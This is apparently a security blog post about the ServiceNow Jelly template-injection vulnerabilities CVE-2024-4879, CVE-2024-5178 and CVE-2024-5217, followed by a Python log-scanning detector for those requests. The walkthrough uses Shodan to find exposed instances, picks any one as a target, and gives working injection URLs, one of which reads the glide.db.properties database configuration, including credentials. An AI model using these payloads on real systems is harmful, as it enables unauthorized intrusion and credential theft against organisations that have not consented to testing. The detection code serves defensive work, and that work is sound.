ServiceNow Template Injection Vulnerability: CVE-2024-4879, CVE-2024-5178, CVE-2024-5217
ServiceNow is a comprehensive platform for business transformation, offering a wide range of modules that can be utilized for various purposes such as HR and employee management, automation workflows, and serving as a knowledge base.
Multiple vulnerabilities have been observed in ServiceNow that allow full database access and full access to any configured MID servers.
The following CVEs were assigned for these issues:
CVE-2024-4879
CVE-2024-5178
CVE-2024-5217
In today’s blog we will see which components are affected and how this vulnerability can be exploited.
Affected Components/versions:
How to hunt, reproduce and verify the vulnerability?
Step 1: Run the query (Set-Cookie: glide_user=””) in Shodan to get the list of IPs where the affected instances of ServiceNow are hosted.
Step 2: Pick any of the targets and open the instance in the browser.
Step 3: Append the SSTI payload to the URL to check whether the application responds with the desired results. It has been observed that the SSTI payload is getting executed.
Payload URL: https://xx.xx.xx.xx/login.do?jvar_page_title=<style><j:jelly%20xmlns:j=”jelly”%20xmlns:g=%27glide%27><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style>
Step 4: Let’s check whether we can access details related to the database. It has been observed that we can access full database details (in some cases we can also fetch credentials).
Payload URL: https://xx.xx.xx.xx/login.do?jvar_page_title=<style><j:jelly%20xmlns:j=”jelly:core”%20xmlns:g=%27glide%27><g:evaluate>z=new%20Packages.java.io.File(“”).getAbsolutePath();z=z.substring(0,z.lastIndexOf(“/”));u=new%20SecurelyAccess(z.concat(“/co..nf/glide.db.properties”)).getBufferedReader();s=””;while((q=u.readLine())!==null)s=s.concat(q,”%5Cn”);gs.addErrorMessage(s);</g:evaluate></j:jelly></style>”
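For defenders, the request pattern shown in the steps above can be hunted for in web server access logs. The following is an added example, not code from the original post; the combined log format, the sample log lines and the function names are assumptions, and it generalizes from jvar_page_title to any jvar_* query parameter.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Jelly markup as it appears in the payload URLs above.
JELLY_MARKUP = re.compile(r"<\s*/?\s*(?:j:jelly|g:evaluate)\b|xmlns:[jg]\s*=", re.I)
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded markup is still recognised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_injection_attempts(lines):
    """Return (ip, status, parameter) for requests with Jelly markup in a jvar_* parameter."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower().startswith("jvar_") and JELLY_MARKUP.search(fully_decode(value)):
                hits.append((m.group("ip"), int(m.group("status")), name))
                break
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jul/2024:10:00:01 +0000] "GET /login.do HTTP/1.1" 200 5120',
    '198.51.100.23 - - [10/Jul/2024:10:00:05 +0000] "GET /login.do?jvar_page_title='
    '%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3E'
    'gs.addErrorMessage(7*7);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1" 200 6044',
    '198.51.100.40 - - [10/Jul/2024:10:00:09 +0000] "GET /login.do?jvar_page_title='
    '%253Cstyle%253E%253Cj%253Ajelly%253E HTTP/1.1" 200 5500',
    '203.0.113.9 - - [10/Jul/2024:10:00:12 +0000] "GET /login.do?jvar_page_title=Welcome HTTP/1.1" 200 5100',
]

if __name__ == "__main__":
    for ip, status, param in find_injection_attempts(SAMPLE_LOG):
        print(f"possible Jelly injection attempt: src={ip} status={status} param={param}")
```

Only query strings are inspected; a payload sent in a POST body does not appear in a standard access log and needs a WAF or application-level log source instead.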
Want to learn more and dig deeper?
I would suggest going through the articles mentioned below.
Let’s connect:
Linkedin: https://www.linkedin.com/in/vaibhav-kumar-srivastava-378742a9/